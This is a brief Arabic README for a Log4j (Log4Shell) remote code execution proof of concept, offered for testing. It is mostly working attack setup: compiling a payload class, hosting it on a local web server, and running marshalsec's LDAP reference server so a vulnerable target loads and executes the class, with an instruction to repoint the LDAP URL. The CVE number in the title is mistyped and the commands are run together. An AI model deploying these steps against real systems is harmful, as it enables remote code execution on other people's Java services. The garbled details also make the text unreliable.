
PoC RCE Log4j CVE-2021-4428 للاختبار
قم بتجميع Log4jRCE.java وانقل ملف .class إلى خادم ويب (مثال: PHP محلي)
cd src/main/javajavac Log4jRCE.javaphp -S 127.0.0.1:8888تشغيل خادم LDAP
git clone [email protected]:Grupo-Kapa-7/marshalsec.gitcd marshalsecmvn clean package -DskipTestsjava -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"لاختبار PoC، قم بتعديل ملف src/main/java/log4j.java وقم بتغيير عنوان URL لخادم LDAP حسب رغبتك.
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce